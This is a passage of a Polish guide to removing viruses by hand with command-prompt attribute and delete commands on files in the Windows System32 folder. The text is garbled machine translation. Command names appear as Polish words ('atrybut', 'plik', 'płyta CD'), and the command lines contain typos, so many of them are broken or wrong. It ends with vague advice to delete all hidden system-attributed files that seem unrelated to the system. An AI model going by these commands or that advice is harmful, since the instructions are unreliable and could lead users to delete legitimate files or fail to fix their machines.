Aby usunąć te pliki, wpisz delnazwa pliku.rozszerzenie lub w naszym przypadku:
plik autorun.inf
To samo należy zrobić z drugim plikiem:
Ręczne usuwanie wirusów
Wchodzić płyta CDwygrać* i naciśnij ENTER.
Wprowadź ponownie system32. Naciśnij ENTER.
Następnie wprowadź polecenie atrybut. Naciśnij ENTER.
To jest długa lista:
Wprowadź ponownie poniższe polecenie atrybut, nie zapomnij kliknąć później WCHODZIĆ:
I znajdujemy te pliki:
Podejrzane pliki w folderze Windows
Ekran porusza się bardzo szybko podczas poruszania się w górę i w dół, więc gdy zacznie migać coś nowego, zatrzymaj się i wróć, aby sprawdzić każdy plik, nie pomijając ani jednego.
Podejrzane pliki w folderze Windows
Zapisujemy wszystko, co znajdziemy SHPliki R:
Uruchom polecenie atrybut 3 lub 4 razy, aby upewnić się, że wszystko sprawdziłeś.
Proszę bardzo. Niezależnie znaleźliśmy aż 4 złośliwy plik! Teraz musimy usunąć te 4 wirusy.
C:\Windows\System32> atrybut -s -h -r -a -i atr.inf
C:\Windows\System32> del atr.inf
C:\Windows\System32> atrybut -s -h -r -a -i dcr.exe
C:\Windows\System32> del dcr.exe
C:\Windows\System32> attrih -s -h -r -a -i desktop.ini
C:\Windows\\System32> plik desktop.ini
C:\Windows\System32> atrybut -s -h -r -a -i idsev.exe
C:\Windows\System32> plik idsev.exe
Samodzielne usuwanie wirusów z komputera
Podobną operację należy wykonać z innymi folderami zagnieżdżonymi w katalogu Windows.
Musimy przeskanować jeszcze kilka katalogów, np Dane aplikacji I Temp. Użyj polecenia atrybut jak pokazano w tym artykule, oraz usuń wszystkie pliki z atrybutami S H R, które nie są z nimi powiązane pliki systemowe i może zainfekować Twój komputer.
